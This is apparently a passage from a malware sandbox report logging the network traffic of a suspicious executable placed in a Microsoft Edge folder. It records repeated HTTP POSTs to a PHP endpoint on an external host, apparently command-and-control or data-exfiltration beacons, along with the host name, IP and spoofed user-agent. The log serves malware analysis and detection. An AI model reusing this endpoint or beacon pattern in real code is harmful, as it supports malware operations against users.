                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:43.135138988 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:43.846937895 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:42 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:43.847678900 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:44.261377096 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:44.962754011 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:43 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:44.963572979 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:45.370719910 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:46.109808922 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:44 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:46.110872984 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:46.517581940 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:47.244147062 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:47.244997025 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:47.651654959 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:48.401667118 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:46 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:48.402759075 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:48.810122013 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:49.600807905 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:47 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:49.601588011 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:50.010785103 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:50.729455948 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:48 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:50.730350018 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:51.140605927 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:51.855381966 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:50 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:51.856213093 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:52.263573885 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:52.983566046 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:51 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:52.984396935 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:53.391231060 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:54.142708063 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:52 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:54.145025969 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:54.552005053 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:55.274697065 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:53 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:55.275549889 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:55.693779945 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:56.132213116 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:54 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:56.133445024 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:56.540699959 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:57.261365891 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:55 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:57.263299942 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:57.694557905 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:58.432641983 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:56 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:58.439273119 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:58.847507000 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:59.562707901 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:57 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:59.563476086 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:59.977632046 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:00.473812103 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:58 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:00.474682093 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:00.881077051 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:01.651535988 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:59 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:01.652292967 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:02.059591055 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:02.852031946 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:01 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:02.853140116 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:03.259530067 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:04.051035881 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:02 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:04.054982901 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:04.473906994 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:05.196027040 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:03 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:05.197107077 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:05.603972912 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:06.390378952 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:04 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:06.391186953 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:06.797950983 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:07.520291090 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:05 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:07.521712065 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:07.928395033 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:08.657363892 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:06 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:08.659593105 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:09.084177971 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:09.775857925 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:09.776954889 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:10.187144995 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:11.107099056 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:11.110819101 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:11.519325018 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:11.978599072 CET308INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:10 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:11.980199099 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:12.386504889 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:13.112950087 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:13.116998911 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:13.523823977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:14.246970892 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:12 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:19:19.683670044 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:19:20.093246937 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:19:20.804892063 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:19:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      1 | 192.168.2.4 | 49734 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:17:28.328624010 CET | 287 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 384
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:28.676296949 CET | 384 | OUT | Data Raw: [384-byte request body]
                                                                                                                      Dec 20, 2024 21:17:29.608760118 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:29.848563910 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:17:29.863013029 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:30.207930088 CET | 2644 | OUT | Data Raw: [2644-byte request body]
                                                                                                                      Dec 20, 2024 21:17:30.273545980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:30.690798044 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:28 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      2 | 192.168.2.4 | 49736 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 20, 2024 21:17:31.148885965 CET | 288 | OUT | POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2644
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:17:31.504317999 CET | 2644 | OUT | Data Raw: [2644-byte request body]
                                                                                                                      Dec 20, 2024 21:17:32.419121027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:17:32.656558990 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:17:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 4
                                                                                                                      Connection: keep-alive
                                                                                                                      Data Raw: 3c 59 5c 5b
                                                                                                                      Data Ascii: <Y\[


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      3 | 192.168.2.4 | 49738 | 37.44.238.250 | 80 | 7664 | C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
